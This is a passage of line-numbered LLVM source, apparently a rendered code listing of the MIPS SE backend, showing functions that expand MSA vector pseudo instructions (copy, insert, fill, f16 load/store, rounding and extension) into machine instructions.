RegInfo.createVirtualRegister(RC); 3073  BuildMI(*TBB, TBB->end(), DL, TII->get(Mips::ADDiu), RD2) 3074  .addReg(Mips::ZERO).addImm(1); 3075  3076  // Insert phi function to $Sink. 3077  BuildMI(*Sink, Sink->begin(), DL, TII->get(Mips::PHI), 3078  MI.getOperand(0).getReg()) 3079  .addReg(RD1) 3080  .addMBB(FBB) 3081  .addReg(RD2) 3082  .addMBB(TBB); 3083  3084  MI.eraseFromParent(); // The pseudo instruction is gone now. 3085  return Sink; 3086 } 3087  3088 // Emit the COPY_FW pseudo instruction. 3089 // 3090 // copy_fw_pseudo $fd, $ws, n 3091 // => 3092 // copy_u_w $rt, $ws, $n 3093 // mtc1 $rt, $fd 3094 // 3095 // When n is zero, the equivalent operation can be performed with (potentially) 3096 // zero instructions due to register overlaps. This optimization is never valid 3097 // for lane 1 because it would require FR=0 mode which isn't supported by MSA. 3099 MipsSETargetLowering::emitCOPY_FW(MachineInstr &MI, 3100  MachineBasicBlock *BB) const { 3102  MachineRegisterInfo &RegInfo = BB->getParent()->getRegInfo(); 3103  DebugLoc DL = MI.getDebugLoc(); 3104  unsigned Fd = MI.getOperand(0).getReg(); 3105  unsigned Ws = MI.getOperand(1).getReg(); 3106  unsigned Lane = MI.getOperand(2).getImm(); 3107  3108  if (Lane == 0) { 3109  unsigned Wt = Ws; 3110  if (!Subtarget.useOddSPReg()) { 3111  // We must copy to an even-numbered MSA register so that the 3112  // single-precision sub-register is also guaranteed to be even-numbered. 3113  Wt = RegInfo.createVirtualRegister(&Mips::MSA128WEvensRegClass); 3114  3115  BuildMI(*BB, MI, DL, TII->get(Mips::COPY), Wt).addReg(Ws); 3116  } 3117  3118  BuildMI(*BB, MI, DL, TII->get(Mips::COPY), Fd).addReg(Wt, 0, Mips::sub_lo); 3119  } else { 3120  unsigned Wt = RegInfo.createVirtualRegister( 3121  Subtarget.useOddSPReg() ? &Mips::MSA128WRegClass : 3122  &Mips::MSA128WEvensRegClass); 3123  3124  BuildMI(*BB, MI, DL, TII->get(Mips::SPLATI_W), Wt).addReg(Ws).addImm(Lane); 3125  BuildMI(*BB, MI, DL, TII->get(Mips::COPY), Fd).addReg(Wt, 0, Mips::sub_lo); 3126  } 3127  3128  MI.eraseFromParent(); // The pseudo instruction is gone now. 3129  return BB; 3130 } 3131  3132 // Emit the COPY_FD pseudo instruction. 3133 // 3134 // copy_fd_pseudo $fd, $ws, n 3135 // => 3136 // splati.d $wt, $ws, $n 3137 // copy $fd, $wt:sub_64 3138 // 3139 // When n is zero, the equivalent operation can be performed with (potentially) 3140 // zero instructions due to register overlaps. This optimization is always 3141 // valid because FR=1 mode which is the only supported mode in MSA. 3143 MipsSETargetLowering::emitCOPY_FD(MachineInstr &MI, 3144  MachineBasicBlock *BB) const { 3146  3148  MachineRegisterInfo &RegInfo = BB->getParent()->getRegInfo(); 3149  unsigned Fd = MI.getOperand(0).getReg(); 3150  unsigned Ws = MI.getOperand(1).getReg(); 3151  unsigned Lane = MI.getOperand(2).getImm() * 2; 3152  DebugLoc DL = MI.getDebugLoc(); 3153  3154  if (Lane == 0) 3155  BuildMI(*BB, MI, DL, TII->get(Mips::COPY), Fd).addReg(Ws, 0, Mips::sub_64); 3156  else { 3157  unsigned Wt = RegInfo.createVirtualRegister(&Mips::MSA128DRegClass); 3158  3159  BuildMI(*BB, MI, DL, TII->get(Mips::SPLATI_D), Wt).addReg(Ws).addImm(1); 3160  BuildMI(*BB, MI, DL, TII->get(Mips::COPY), Fd).addReg(Wt, 0, Mips::sub_64); 3161  } 3162  3163  MI.eraseFromParent(); // The pseudo instruction is gone now. 3164  return BB; 3165 } 3166  3167 // Emit the INSERT_FW pseudo instruction. 3168 // 3169 // insert_fw_pseudo $wd, $wd_in, $n, $fs 3170 // => 3171 // subreg_to_reg $wt:sub_lo, $fs 3172 // insve_w $wd[$n], $wd_in, $wt[0] 3174 MipsSETargetLowering::emitINSERT_FW(MachineInstr &MI, 3175  MachineBasicBlock *BB) const { 3177  MachineRegisterInfo &RegInfo = BB->getParent()->getRegInfo(); 3178  DebugLoc DL = MI.getDebugLoc(); 3179  unsigned Wd = MI.getOperand(0).getReg(); 3180  unsigned Wd_in = MI.getOperand(1).getReg(); 3181  unsigned Lane = MI.getOperand(2).getImm(); 3182  unsigned Fs = MI.getOperand(3).getReg(); 3183  unsigned Wt = RegInfo.createVirtualRegister( 3184  Subtarget.useOddSPReg() ? &Mips::MSA128WRegClass : 3185  &Mips::MSA128WEvensRegClass); 3186  3187  BuildMI(*BB, MI, DL, TII->get(Mips::SUBREG_TO_REG), Wt) 3188  .addImm(0) 3189  .addReg(Fs) 3190  .addImm(Mips::sub_lo); 3191  BuildMI(*BB, MI, DL, TII->get(Mips::INSVE_W), Wd) 3192  .addReg(Wd_in) 3193  .addImm(Lane) 3194  .addReg(Wt) 3195  .addImm(0); 3196  3197  MI.eraseFromParent(); // The pseudo instruction is gone now. 3198  return BB; 3199 } 3200  3201 // Emit the INSERT_FD pseudo instruction. 3202 // 3203 // insert_fd_pseudo $wd, $fs, n 3204 // => 3205 // subreg_to_reg $wt:sub_64, $fs 3206 // insve_d $wd[$n], $wd_in, $wt[0] 3208 MipsSETargetLowering::emitINSERT_FD(MachineInstr &MI, 3209  MachineBasicBlock *BB) const { 3211  3213  MachineRegisterInfo &RegInfo = BB->getParent()->getRegInfo(); 3214  DebugLoc DL = MI.getDebugLoc(); 3215  unsigned Wd = MI.getOperand(0).getReg(); 3216  unsigned Wd_in = MI.getOperand(1).getReg(); 3217  unsigned Lane = MI.getOperand(2).getImm(); 3218  unsigned Fs = MI.getOperand(3).getReg(); 3219  unsigned Wt = RegInfo.createVirtualRegister(&Mips::MSA128DRegClass); 3220  3221  BuildMI(*BB, MI, DL, TII->get(Mips::SUBREG_TO_REG), Wt) 3222  .addImm(0) 3223  .addReg(Fs) 3224  .addImm(Mips::sub_64); 3225  BuildMI(*BB, MI, DL, TII->get(Mips::INSVE_D), Wd) 3226  .addReg(Wd_in) 3227  .addImm(Lane) 3228  .addReg(Wt) 3229  .addImm(0); 3230  3231  MI.eraseFromParent(); // The pseudo instruction is gone now. 3232  return BB; 3233 } 3234  3235 // Emit the INSERT_([BHWD]|F[WD])_VIDX pseudo instruction. 3236 // 3237 // For integer: 3238 // (INSERT_([BHWD]|F[WD])_PSEUDO $wd, $wd_in, $n, $rs) 3239 // => 3240 // (SLL $lanetmp1, $lane, <log2size) 3241 // (SLD_B $wdtmp1, $wd_in, $wd_in, $lanetmp1) 3242 // (INSERT_[BHWD], $wdtmp2, $wdtmp1, 0, $rs) 3243 // (NEG $lanetmp2, $lanetmp1) 3244 // (SLD_B $wd, $wdtmp2, $wdtmp2, $lanetmp2) 3245 // 3246 // For floating point: 3247 // (INSERT_([BHWD]|F[WD])_PSEUDO $wd, $wd_in, $n, $fs) 3248 // => 3249 // (SUBREG_TO_REG $wt, $fs, <subreg>) 3250 // (SLL $lanetmp1, $lane, <log2size) 3251 // (SLD_B $wdtmp1, $wd_in, $wd_in, $lanetmp1) 3252 // (INSVE_[WD], $wdtmp2, 0, $wdtmp1, 0) 3253 // (NEG $lanetmp2, $lanetmp1) 3254 // (SLD_B $wd, $wdtmp2, $wdtmp2, $lanetmp2) 3255 MachineBasicBlock *MipsSETargetLowering::emitINSERT_DF_VIDX( 3256  MachineInstr &MI, MachineBasicBlock *BB, unsigned EltSizeInBytes, 3257  bool IsFP) const { 3259  MachineRegisterInfo &RegInfo = BB->getParent()->getRegInfo(); 3260  DebugLoc DL = MI.getDebugLoc(); 3261  unsigned Wd = MI.getOperand(0).getReg(); 3262  unsigned SrcVecReg = MI.getOperand(1).getReg(); 3263  unsigned LaneReg = MI.getOperand(2).getReg(); 3264  unsigned SrcValReg = MI.getOperand(3).getReg(); 3265  3266  const TargetRegisterClass *VecRC = nullptr; 3267  // FIXME: This should be true for N32 too. 3268  const TargetRegisterClass *GPRRC = 3269  Subtarget.isABI_N64() ? &Mips::GPR64RegClass : &Mips::GPR32RegClass; 3270  unsigned SubRegIdx = Subtarget.isABI_N64() ? Mips::sub_32 : 0; 3271  unsigned ShiftOp = Subtarget.isABI_N64() ? Mips::DSLL : Mips::SLL; 3272  unsigned EltLog2Size; 3273  unsigned InsertOp = 0; 3274  unsigned InsveOp = 0; 3275  switch (EltSizeInBytes) { 3276  default: 3277  llvm_unreachable("Unexpected size"); 3278  case 1: 3279  EltLog2Size = 0; 3280  InsertOp = Mips::INSERT_B; 3281  InsveOp = Mips::INSVE_B; 3282  VecRC = &Mips::MSA128BRegClass; 3283  break; 3284  case 2: 3285  EltLog2Size = 1; 3286  InsertOp = Mips::INSERT_H; 3287  InsveOp = Mips::INSVE_H; 3288  VecRC = &Mips::MSA128HRegClass; 3289  break; 3290  case 4: 3291  EltLog2Size = 2; 3292  InsertOp = Mips::INSERT_W; 3293  InsveOp = Mips::INSVE_W; 3294  VecRC = &Mips::MSA128WRegClass; 3295  break; 3296  case 8: 3297  EltLog2Size = 3; 3298  InsertOp = Mips::INSERT_D; 3299  InsveOp = Mips::INSVE_D; 3300  VecRC = &Mips::MSA128DRegClass; 3301  break; 3302  } 3303  3304  if (IsFP) { 3305  unsigned Wt = RegInfo.createVirtualRegister(VecRC); 3306  BuildMI(*BB, MI, DL, TII->get(Mips::SUBREG_TO_REG), Wt) 3307  .addImm(0) 3308  .addReg(SrcValReg) 3309  .addImm(EltSizeInBytes == 8 ? Mips::sub_64 : Mips::sub_lo); 3310  SrcValReg = Wt; 3311  } 3312  3313  // Convert the lane index into a byte index 3314  if (EltSizeInBytes != 1) { 3315  unsigned LaneTmp1 = RegInfo.createVirtualRegister(GPRRC); 3316  BuildMI(*BB, MI, DL, TII->get(ShiftOp), LaneTmp1) 3317  .addReg(LaneReg) 3318  .addImm(EltLog2Size); 3319  LaneReg = LaneTmp1; 3320  } 3321  3322  // Rotate bytes around so that the desired lane is element zero 3323  unsigned WdTmp1 = RegInfo.createVirtualRegister(VecRC); 3324  BuildMI(*BB, MI, DL, TII->get(Mips::SLD_B), WdTmp1) 3325  .addReg(SrcVecReg) 3326  .addReg(SrcVecReg) 3327  .addReg(LaneReg, 0, SubRegIdx); 3328  3329  unsigned WdTmp2 = RegInfo.createVirtualRegister(VecRC); 3330  if (IsFP) { 3331  // Use insve.df to insert to element zero 3332  BuildMI(*BB, MI, DL, TII->get(InsveOp), WdTmp2) 3333  .addReg(WdTmp1) 3334  .addImm(0) 3335  .addReg(SrcValReg) 3336  .addImm(0); 3337  } else { 3338  // Use insert.df to insert to element zero 3339  BuildMI(*BB, MI, DL, TII->get(InsertOp), WdTmp2) 3340  .addReg(WdTmp1) 3341  .addReg(SrcValReg) 3342  .addImm(0); 3343  } 3344  3345  // Rotate elements the rest of the way for a full rotation. 3346  // sld.df inteprets $rt modulo the number of columns so we only need to negate 3347  // the lane index to do this. 3348  unsigned LaneTmp2 = RegInfo.createVirtualRegister(GPRRC); 3349  BuildMI(*BB, MI, DL, TII->get(Subtarget.isABI_N64() ? Mips::DSUB : Mips::SUB), 3350  LaneTmp2) 3351  .addReg(Subtarget.isABI_N64() ? Mips::ZERO_64 : Mips::ZERO) 3352  .addReg(LaneReg); 3353  BuildMI(*BB, MI, DL, TII->get(Mips::SLD_B), Wd) 3354  .addReg(WdTmp2) 3355  .addReg(WdTmp2) 3356  .addReg(LaneTmp2, 0, SubRegIdx); 3357  3358  MI.eraseFromParent(); // The pseudo instruction is gone now. 3359  return BB; 3360 } 3361  3362 // Emit the FILL_FW pseudo instruction. 3363 // 3364 // fill_fw_pseudo $wd, $fs 3365 // => 3366 // implicit_def $wt1 3367 // insert_subreg $wt2:subreg_lo, $wt1, $fs 3368 // splati.w $wd, $wt2[0] 3370 MipsSETargetLowering::emitFILL_FW(MachineInstr &MI, 3371  MachineBasicBlock *BB) const { 3373  MachineRegisterInfo &RegInfo = BB->getParent()->getRegInfo(); 3374  DebugLoc DL = MI.getDebugLoc(); 3375  unsigned Wd = MI.getOperand(0).getReg(); 3376  unsigned Fs = MI.getOperand(1).getReg(); 3377  unsigned Wt1 = RegInfo.createVirtualRegister( 3378  Subtarget.useOddSPReg() ? &Mips::MSA128WRegClass 3379  : &Mips::MSA128WEvensRegClass); 3380  unsigned Wt2 = RegInfo.createVirtualRegister( 3381  Subtarget.useOddSPReg() ? &Mips::MSA128WRegClass 3382  : &Mips::MSA128WEvensRegClass); 3383  3384  BuildMI(*BB, MI, DL, TII->get(Mips::IMPLICIT_DEF), Wt1); 3385  BuildMI(*BB, MI, DL, TII->get(Mips::INSERT_SUBREG), Wt2) 3386  .addReg(Wt1) 3387  .addReg(Fs) 3388  .addImm(Mips::sub_lo); 3389  BuildMI(*BB, MI, DL, TII->get(Mips::SPLATI_W), Wd).addReg(Wt2).addImm(0); 3390  3391  MI.eraseFromParent(); // The pseudo instruction is gone now. 3392  return BB; 3393 } 3394  3395 // Emit the FILL_FD pseudo instruction. 3396 // 3397 // fill_fd_pseudo $wd, $fs 3398 // => 3399 // implicit_def $wt1 3400 // insert_subreg $wt2:subreg_64, $wt1, $fs 3401 // splati.d $wd, $wt2[0] 3403 MipsSETargetLowering::emitFILL_FD(MachineInstr &MI, 3404  MachineBasicBlock *BB) const { 3406  3408  MachineRegisterInfo &RegInfo = BB->getParent()->getRegInfo(); 3409  DebugLoc DL = MI.getDebugLoc(); 3410  unsigned Wd = MI.getOperand(0).getReg(); 3411  unsigned Fs = MI.getOperand(1).getReg(); 3412  unsigned Wt1 = RegInfo.createVirtualRegister(&Mips::MSA128DRegClass); 3413  unsigned Wt2 = RegInfo.createVirtualRegister(&Mips::MSA128DRegClass); 3414  3415  BuildMI(*BB, MI, DL, TII->get(Mips::IMPLICIT_DEF), Wt1); 3416  BuildMI(*BB, MI, DL, TII->get(Mips::INSERT_SUBREG), Wt2) 3417  .addReg(Wt1) 3418  .addReg(Fs) 3419  .addImm(Mips::sub_64); 3420  BuildMI(*BB, MI, DL, TII->get(Mips::SPLATI_D), Wd).addReg(Wt2).addImm(0); 3421  3422  MI.eraseFromParent(); // The pseudo instruction is gone now. 3423  return BB; 3424 } 3425  3426 // Emit the ST_F16_PSEDUO instruction to store a f16 value from an MSA 3427 // register. 3428 // 3429 // STF16 MSA128F16:$wd, mem_simm10:$addr 3430 // => 3431 // copy_u.h $rtemp,$wd[0] 3432 // sh $rtemp, $addr 3433 // 3434 // Safety: We can't use st.h & co as they would over write the memory after 3435 // the destination. It would require half floats be allocated 16 bytes(!) of 3436 // space. 3438 MipsSETargetLowering::emitST_F16_PSEUDO(MachineInstr &MI, 3439  MachineBasicBlock *BB) const { 3440  3442  MachineRegisterInfo &RegInfo = BB->getParent()->getRegInfo(); 3443  DebugLoc DL = MI.getDebugLoc(); 3444  unsigned Ws = MI.getOperand(0).getReg(); 3445  unsigned Rt = MI.getOperand(1).getReg(); 3446  const MachineMemOperand &MMO = **MI.memoperands_begin(); 3447  unsigned Imm = MMO.getOffset(); 3448  3449  // Caution: A load via the GOT can expand to a GPR32 operand, a load via 3450  // spill and reload can expand as a GPR64 operand. Examine the 3451  // operand in detail and default to ABI. 3452  const TargetRegisterClass *RC = 3453  MI.getOperand(1).isReg() ? RegInfo.getRegClass(MI.getOperand(1).getReg()) 3454  : (Subtarget.isABI_O32() ? &Mips::GPR32RegClass 3455  : &Mips::GPR64RegClass); 3456  const bool UsingMips32 = RC == &Mips::GPR32RegClass; 3457  unsigned Rs = RegInfo.createVirtualRegister(&Mips::GPR32RegClass); 3458  3459  BuildMI(*BB, MI, DL, TII->get(Mips::COPY_U_H), Rs).addReg(Ws).addImm(0); 3460  if(!UsingMips32) { 3461  unsigned Tmp = RegInfo.createVirtualRegister(&Mips::GPR64RegClass); 3462  BuildMI(*BB, MI, DL, TII->get(Mips::SUBREG_TO_REG), Tmp) 3463  .addImm(0) 3464  .addReg(Rs) 3465  .addImm(Mips::sub_32); 3466  Rs = Tmp; 3467  } 3468  BuildMI(*BB, MI, DL, TII->get(UsingMips32 ? Mips::SH : Mips::SH64)) 3469  .addReg(Rs) 3470  .addReg(Rt) 3471  .addImm(Imm) 3473  &MMO, MMO.getOffset(), MMO.getSize())); 3474  3475  MI.eraseFromParent(); 3476  return BB; 3477 } 3478  3479 // Emit the LD_F16_PSEDUO instruction to load a f16 value into an MSA register. 3480 // 3481 // LD_F16 MSA128F16:$wd, mem_simm10:$addr 3482 // => 3483 // lh $rtemp, $addr 3484 // fill.h $wd, $rtemp 3485 // 3486 // Safety: We can't use ld.h & co as they over-read from the source. 3487 // Additionally, if the address is not modulo 16, 2 cases can occur: 3488 // a) Segmentation fault as the load instruction reads from a memory page 3489 // memory it's not supposed to. 3490 // b) The load crosses an implementation specific boundary, requiring OS 3491 // intervention. 3493 MipsSETargetLowering::emitLD_F16_PSEUDO(MachineInstr &MI, 3494  MachineBasicBlock *BB) const { 3495  3497  MachineRegisterInfo &RegInfo = BB->getParent()->getRegInfo(); 3498  DebugLoc DL = MI.getDebugLoc(); 3499  unsigned Wd = MI.getOperand(0).getReg(); 3500  3501  // Caution: A load via the GOT can expand to a GPR32 operand, a load via 3502  // spill and reload can expand as a GPR64 operand. Examine the 3503  // operand in detail and default to ABI. 3504  const TargetRegisterClass *RC = 3505  MI.getOperand(1).isReg() ? RegInfo.getRegClass(MI.getOperand(1).getReg()) 3506  : (Subtarget.isABI_O32() ? &Mips::GPR32RegClass 3507  : &Mips::GPR64RegClass); 3508  3509  const bool UsingMips32 = RC == &Mips::GPR32RegClass; 3510  unsigned Rt = RegInfo.createVirtualRegister(RC); 3511  3512  MachineInstrBuilder MIB = 3513  BuildMI(*BB, MI, DL, TII->get(UsingMips32 ? Mips::LH : Mips::LH64), Rt); 3514  for (unsigned i = 1; i < MI.getNumOperands(); i++) 3515  MIB.add(MI.getOperand(i)); 3516  3517  if(!UsingMips32) { 3518  unsigned Tmp = RegInfo.createVirtualRegister(&Mips::GPR32RegClass); 3519  BuildMI(*BB, MI, DL, TII->get(Mips::COPY), Tmp).addReg(Rt, 0, Mips::sub_32); 3520  Rt = Tmp; 3521  } 3522  3523  BuildMI(*BB, MI, DL, TII->get(Mips::FILL_H), Wd).addReg(Rt); 3524  3525  MI.eraseFromParent(); 3526  return BB; 3527 } 3528  3529 // Emit the FPROUND_PSEUDO instruction. 3530 // 3531 // Round an FGR64Opnd, FGR32Opnd to an f16. 3532 // 3533 // Safety: Cycle the operand through the GPRs so the result always ends up 3534 // the correct MSA register. 3535 // 3536 // FIXME: This copying is strictly unnecessary. If we could tie FGR32Opnd:$Fs 3537 // / FGR64Opnd:$Fs and MSA128F16:$Wd to the same physical register 3538 // (which they can be, as the MSA registers are defined to alias the 3539 // FPU's 64 bit and 32 bit registers) the result can be accessed using 3540 // the correct register class. That requires operands be tie-able across 3541 // register classes which have a sub/super register class relationship. 3542 // 3543 // For FPG32Opnd: 3544 // 3545 // FPROUND MSA128F16:$wd, FGR32Opnd:$fs 3546 // => 3547 // mfc1 $rtemp, $fs 3548 // fill.w $rtemp, $wtemp 3549 // fexdo.w $wd, $wtemp, $wtemp 3550 // 3551 // For FPG64Opnd on mips32r2+: 3552 // 3553 // FPROUND MSA128F16:$wd, FGR64Opnd:$fs 3554 // => 3555 // mfc1 $rtemp, $fs 3556 // fill.w $rtemp, $wtemp 3557 // mfhc1 $rtemp2, $fs 3558 // insert.w $wtemp[1], $rtemp2 3559 // insert.w $wtemp[3], $rtemp2 3560 // fexdo.w $wtemp2, $wtemp, $wtemp 3561 // fexdo.h $wd, $temp2, $temp2 3562 // 3563 // For FGR64Opnd on mips64r2+: 3564 // 3565 // FPROUND MSA128F16:$wd, FGR64Opnd:$fs 3566 // => 3567 // dmfc1 $rtemp, $fs 3568 // fill.d $rtemp, $wtemp 3569 // fexdo.w $wtemp2, $wtemp, $wtemp 3570 // fexdo.h $wd, $wtemp2, $wtemp2 3571 // 3572 // Safety note: As $wtemp is UNDEF, we may provoke a spurious exception if the 3573 // undef bits are "just right" and the exception enable bits are 3574 // set. By using fill.w to replicate $fs into all elements over 3575 // insert.w for one element, we avoid that potiential case. If 3576 // fexdo.[hw] causes an exception in, the exception is valid and it 3577 // occurs for all elements. 3579 MipsSETargetLowering::emitFPROUND_PSEUDO(MachineInstr &MI, 3580  MachineBasicBlock *BB, 3581  bool IsFGR64) const { 3582  3583  // Strictly speaking, we need MIPS32R5 to support MSA. We'll be generous 3584  // here. It's technically doable to support MIPS32 here, but the ISA forbids 3585  // it. 3587  3588  bool IsFGR64onMips64 = Subtarget.hasMips64() && IsFGR64; 3589  bool IsFGR64onMips32 = !Subtarget.hasMips64() && IsFGR64; 3590  3592  DebugLoc DL = MI.getDebugLoc(); 3593  unsigned Wd = MI.getOperand(0).getReg(); 3594  unsigned Fs = MI.getOperand(1).getReg(); 3595  3596  MachineRegisterInfo &RegInfo = BB->getParent()->getRegInfo(); 3597  unsigned Wtemp = RegInfo.createVirtualRegister(&Mips::MSA128WRegClass); 3598  const TargetRegisterClass *GPRRC = 3599  IsFGR64onMips64 ? &Mips::GPR64RegClass : &Mips::GPR32RegClass; 3600  unsigned MFC1Opc = IsFGR64onMips64 3601  ? Mips::DMFC1 3602  : (IsFGR64onMips32 ? Mips::MFC1_D64 : Mips::MFC1); 3603  unsigned FILLOpc = IsFGR64onMips64 ? Mips::FILL_D : Mips::FILL_W; 3604  3605  // Perform the register class copy as mentioned above. 3606  unsigned Rtemp = RegInfo.createVirtualRegister(GPRRC); 3607  BuildMI(*BB, MI, DL, TII->get(MFC1Opc), Rtemp).addReg(Fs); 3608  BuildMI(*BB, MI, DL, TII->get(FILLOpc), Wtemp).addReg(Rtemp); 3609  unsigned WPHI = Wtemp; 3610  3611  if (IsFGR64onMips32) { 3612  unsigned Rtemp2 = RegInfo.createVirtualRegister(GPRRC); 3613  BuildMI(*BB, MI, DL, TII->get(Mips::MFHC1_D64), Rtemp2).addReg(Fs); 3614  unsigned Wtemp2 = RegInfo.createVirtualRegister(&Mips::MSA128WRegClass); 3615  unsigned Wtemp3 = RegInfo.createVirtualRegister(&Mips::MSA128WRegClass); 3616  BuildMI(*BB, MI, DL, TII->get(Mips::INSERT_W), Wtemp2) 3617  .addReg(Wtemp) 3618  .addReg(Rtemp2) 3619  .addImm(1); 3620  BuildMI(*BB, MI, DL, TII->get(Mips::INSERT_W), Wtemp3) 3621  .addReg(Wtemp2) 3622  .addReg(Rtemp2) 3623  .addImm(3); 3624  WPHI = Wtemp3; 3625  } 3626  3627  if (IsFGR64) { 3628  unsigned Wtemp2 = RegInfo.createVirtualRegister(&Mips::MSA128WRegClass); 3629  BuildMI(*BB, MI, DL, TII->get(Mips::FEXDO_W), Wtemp2) 3630  .addReg(WPHI) 3631  .addReg(WPHI); 3632  WPHI = Wtemp2; 3633  } 3634  3635  BuildMI(*BB, MI, DL, TII->get(Mips::FEXDO_H), Wd).addReg(WPHI).addReg(WPHI); 3636  3637  MI.eraseFromParent(); 3638  return BB; 3639 } 3640  3641 // Emit the FPEXTEND_PSEUDO instruction. 3642 // 3643 // Expand an f16 to either a FGR32Opnd or FGR64Opnd. 3644 // 3645 // Safety: Cycle the result through the GPRs so the result always ends up 3646 // the correct floating point register. 3647 // 3648 // FIXME: This copying is strictly unnecessary. If we could tie FGR32Opnd:$Fd 3649 // / FGR64Opnd:$Fd and MSA128F16:$Ws to the same physical register 3650 // (which they can be, as the MSA registers are defined to alias the 3651 // FPU's 64 bit and 32 bit registers) the result can be accessed using 3652 // the correct register class. That requires operands be tie-able across 3653 // register classes which have a sub/super register class relationship. I 3654 // haven't checked. 3655 // 3656 // For FGR32Opnd: 3657 // 3658 // FPEXTEND FGR32Opnd:$fd, MSA128F16:$ws 3659 // => 3660 // fexupr.w $wtemp, $ws 3661 // copy_s.w $rtemp, $ws[0] 3662 // mtc1 $rtemp, $fd 3663 // 3664 // For FGR64Opnd on Mips64: 3665 // 3666 // FPEXTEND FGR64Opnd:$fd, MSA128F16:$ws 3667 // => 3668 // fexupr.w $wtemp, $ws 3669 // fexupr.d $wtemp2, $wtemp 3670 // copy_s.d $rtemp, $wtemp2s[0] 3671 // dmtc1 $rtemp, $fd 3672 // 3673 // For FGR64Opnd on Mips32: 3674 // 3675 // FPEXTEND FGR64Opnd:$fd, MSA128F16:$ws 3676 // => 3677 // fexupr.w $wtemp, $ws 3678 // fexupr.d $wtemp2, $wtemp 3679 // copy_s.w $rtemp, $wtemp2[0] 3680 // mtc1 $rtemp, $ftemp 3681 // copy_s.w $rtemp2, $wtemp2[1] 3682 // $fd = mthc1 $rtemp2, $ftemp 3684 MipsSETargetLowering::emitFPEXTEND_PSEUDO(MachineInstr &MI, 3685  MachineBasicBlock *BB, 3686  bool IsFGR64) const { 3687  3688  // Strictly speaking, we need MIPS32R5 to support MSA. We'll be generous 3689  // here. It's technically doable to support MIPS32 here, but the ISA forbids 3690  // it. 3692  3693  bool IsFGR64onMips64 = Subtarget.hasMips64() && IsFGR64; 3694  bool IsFGR64onMips32 = !Subtarget.hasMips64() && IsFGR64; 3695  3697  DebugLoc DL = MI.getDebugLoc(); 3698  unsigned Fd = MI.getOperand(0).getReg(); 3699  unsigned Ws = MI.getOperand(1).getReg(); 3700  3701  MachineRegisterInfo &RegInfo = BB->getParent()->getRegInfo(); 3702  const TargetRegisterClass *GPRRC = 3703  IsFGR64onMips64 ? &Mips::GPR64RegClass : &Mips::GPR32RegClass; 3704  unsigned MTC1Opc = IsFGR64onMips64 3705  ? Mips::DMTC1 3706  : (IsFGR64onMips32 ? Mips::MTC1_D64 : Mips::MTC1); 3707  unsigned COPYOpc = IsFGR64onMips64 ? Mips::COPY_S_D : Mips::COPY_S_W; 3708  3709  unsigned Wtemp = RegInfo.createVirtualRegister(&Mips::MSA128WRegClass); 3710  unsigned WPHI = Wtemp; 3711  3712  BuildMI(*BB, MI, DL, TII->get(Mips::FEXUPR_W), Wtemp).addReg(Ws); 3713  if (IsFGR64) { 3714  WPHI = RegInfo.createVirtualRegister(&Mips::MSA128DRegClass); 3715  BuildMI(*BB, MI, DL, TII->get(Mips::FEXUPR_D), WPHI).addReg(Wtemp); 3716  } 3717  3718  // Perform the safety regclass copy mentioned above. 3719  unsigned Rtemp = RegInfo.createVirtualRegister(GPRRC); 3720  unsigned FPRPHI = IsFGR64onMips32 3721  ? RegInfo.createVirtualRegister(&Mips::FGR64RegClass) 3722  : Fd; 3723  BuildMI(*BB, MI, DL, TII->get(COPYOpc), Rtemp).addReg(WPHI).addImm(0); 3724  BuildMI(*BB, MI, DL, TII->get(MTC1Opc), FPRPHI).addReg(Rtemp); 3725  3726  if (IsFGR64onMips32) { 3727  unsigned Rtemp2 = RegInfo.createVirtualRegister(GPRRC); 3728  BuildMI(*BB, MI, DL, TII->get(Mips::COPY_S_W), Rtemp2) 3729  .addReg(WPHI) 3730  .addImm(1); 3731  BuildMI(*BB, MI, DL, TII->get(Mips::MTHC1_D64), Fd) 3732  .addReg(FPRPHI) 3733  .addReg(Rtemp2); 3734  } 3735  3736  MI.eraseFromParent(); 3737  return BB; 3738 } 3739  3740 // Emit the FEXP2_W_1 pseudo instructions. 3741 // 3742 // fexp2_w_1_pseudo $wd, $wt 3743 // => 3744 // ldi.w $ws, 1 3745 // fexp2.w $wd, $ws, $wt 3747 MipsSETargetLowering::emitFEXP2_W_1(MachineInstr &MI, 3748  MachineBasicBlock *BB) const { 3750  MachineRegisterInfo &RegInfo = BB->getParent()->getRegInfo(); 3751  const TargetRegisterClass *RC = &Mips::MSA128WRegClass; 3752  unsigned Ws1 = RegInfo.createVirtualRegister(RC); 3753  unsigned Ws2 = RegInfo.createVirtualRegister(RC); 3754  DebugLoc DL = MI.getDebugLoc(); 3755  3756  // Splat 1.0 into a vector 3757  BuildMI(*BB, MI, DL, TII->get(Mips::LDI_W), Ws1).addImm(1); 3758  BuildMI(*BB, MI, DL, TII->get(Mips::FFINT_U_W), Ws2).addReg(Ws1); 3759  3760  // Emit 1.0 * fexp2(Wt) 3761  BuildMI(*BB, MI, DL, TII->get(Mips::FEXP2_W), MI.getOperand(0).getReg()) 3762  .addReg(Ws2) 3763  .addReg(MI.getOperand(1).getReg()); 3764  3765  MI.eraseFromParent(); // The pseudo instruction is gone now. 3766  return BB; 3767 } 3768  3769 // Emit the FEXP2_D_1 pseudo instructions. 3770 // 3771 // fexp2_d_1_pseudo $wd, $wt 3772 // => 3773 // ldi.d $ws, 1 3774 // fexp2.d $wd, $ws, $wt 3776 MipsSETargetLowering::emitFEXP2_D_1(MachineInstr &MI, 3777  MachineBasicBlock *BB) const { 3779  MachineRegisterInfo &RegInfo = BB->getParent()->getRegInfo(); 3780  const TargetRegisterClass *RC = &Mips::MSA128DRegClass; 3781  unsigned Ws1 = RegInfo.createVirtualRegister(RC); 3782  unsigned Ws2 = RegInfo.createVirtualRegister(RC); 3783  DebugLoc DL = MI.getDebugLoc(); 3784  3785  // Splat 1.0 into a vector 3786  BuildMI(*BB, MI, DL, TII->get(Mips::LDI_D), Ws1).addImm(1); 3787  BuildMI(*BB, MI, DL, TII->get(Mips::FFINT_U_D), Ws2).addReg(Ws1); 3788  3789  // Emit 1.0 * fexp2(Wt) 3790  BuildMI(*BB, MI, DL, TII->get(Mips::FEXP2_D), MI.getOperand(0).getReg()) 3791  .addReg(Ws2) 3792  .addReg(MI.getOperand(1).getReg()); 3793  3794  MI.eraseFromParent(); // The pseudo instruction is gone now. 3795  return BB; 3796 } SDValue getStore(SDValue Chain, const SDLoc &dl, SDValue Val, SDValue Ptr, MachinePointerInfo PtrInfo, unsigned Alignment=0, MachineMemOperand::Flags MMOFlags=MachineMemOperand::MONone, const AAMDNodes &AAInfo=AAMDNodes()) Helper function to build ISD::STORE 